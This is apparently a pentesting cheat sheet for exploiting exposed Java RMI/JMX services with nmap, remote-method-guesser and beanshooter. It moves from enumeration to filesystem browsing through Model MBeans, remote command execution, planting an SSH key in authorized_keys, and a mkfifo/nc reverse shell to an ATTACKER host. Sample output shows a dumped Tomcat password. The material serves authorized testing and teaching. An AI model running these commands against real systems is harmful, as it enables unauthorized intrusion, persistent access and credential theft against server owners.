# Pentesting Java RMI/JMX ## Discovery ```bash # Nmap identifies RMI nmap -sC -sV TARGET -p 1099,2222,9010 # Common RMI output 2222/tcp open java-rmi Java RMI | rmi-dumpregistry: | jmxrmi | javax.management.remote.rmi.RMIServerImpl_Stub ``` **Common Ports:** * 1099 - Default RMI registry * 2222 - Alternative RMI * 9010 - JMX remote *** ## remote-method-guesser (rmg) Tool for Java RMI vulnerability scanning. ### Installation ```bash # Download release wget https://github.com/qtc-de/remote-method-guesser/releases/download/v5.1.0/rmg-5.1.0-jar-with-dependencies.jar ``` ### Enumeration ```bash # Basic enumeration java -jar rmg-5.1.0-jar-with-dependencies.jar enum TARGET 2222 # Output shows: # - Bound names (jmxrmi) # - Codebase enumeration # - Security manager status # - JEP290 status # - CVE-2019-2684 status ``` ### Method Guessing ```bash # Guess available methods java -jar rmg-5.1.0-jar-with-dependencies.jar guess TARGET 2222 # Example output: # [+] - jmxrmi # [+] --> String getVersion() # [+] --> javax.management.remote.rmi.RMIConnection newClient(Object params) ``` ### Known Objects Info ```bash # Get info on known RMI objects java -jar rmg-5.1.0-jar-with-dependencies.jar known javax.management.remote.rmi.RMIServerImpl_Stub # Shows vulnerabilities like MLet and Deserialization attacks ``` *** ## Beanshooter (JMX Exploitation) JMX enumeration and attacking tool. ### Installation ```bash # Download release wget https://github.com/qtc-de/beanshooter/releases/download/v4.1.0/beanshooter-4.1.0-jar-with-dependencies.jar # Or build from source for full features (tonka shell) sudo apt install maven git clone https://github.com/qtc-de/beanshooter cd beanshooter mvn package cd tonka-bean/ mvn package ``` ### Enumeration ```bash # Basic enumeration java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum TARGET 2222 # Check for unauthorized access, deserialization, available MBeans # [+] - Remote MBean server does not require authentication. # Vulnerability Status: Vulnerable ``` ### Enumerate Tomcat Users via JMX ```bash # If JMX is connected to Tomcat, can enumerate users java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum TARGET 2222 # Output: # [+] Enumerating tomcat users: # [+] - Listing 2 tomcat users: # [+] Username: manager # [+] Password: fhErvo2r9wuTEYiYgt # [+] Roles: manage-gui ``` ### List MBeans ```bash java -jar beanshooter-4.1.0-jar-with-dependencies.jar list TARGET 2222 java -jar beanshooter-4.1.0-jar-with-dependencies.jar info TARGET 2222 ``` ### File System Access via Model MBean Deploy a Model MBean with java.io.File to enumerate the filesystem: ```bash # Deploy MBean with java.io.File java -jar beanshooter-4.1.0-jar-with-dependencies.jar model TARGET 2222 de.qtc.beanshooter:version=1 java.io.File 'new java.io.File("/")' # List directory contents java -jar beanshooter-4.1.0-jar-with-dependencies.jar invoke TARGET 2222 de.qtc.beanshooter:version=1 --signature 'list()' # Change directory java -jar beanshooter-4.1.0-jar-with-dependencies.jar invoke TARGET 2222 de.qtc.beanshooter:version=1 --signature 'setManagedResource(Object a, String b)' 'new java.io.File("/home")' objectReference # List new directory java -jar beanshooter-4.1.0-jar-with-dependencies.jar invoke TARGET 2222 de.qtc.beanshooter:version=1 --signature 'list()' ``` ### Remote Code Execution via StandardMBean ```bash # Execute command (uses TemplateImpl payload) java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 exec 'whoami' # Write SSH key java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 exec 'echo "ssh-ed25519 AAAA..." >> /home/user/.ssh/authorized_keys' # Reverse shell (may need /bin/bash wrapper) java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 exec '/bin/bash -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ATTACKER 9001 >/tmp/f"' ``` ### Tonka Shell (Full Build Required) ```bash # Deploy tonka java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 tonka # Get interactive shell java -jar beanshooter-4.1.0-jar-with-dependencies.jar tonka shell TARGET 2222 [tomcat@TARGET /]$ whoami tomcat ``` *** ## References * * *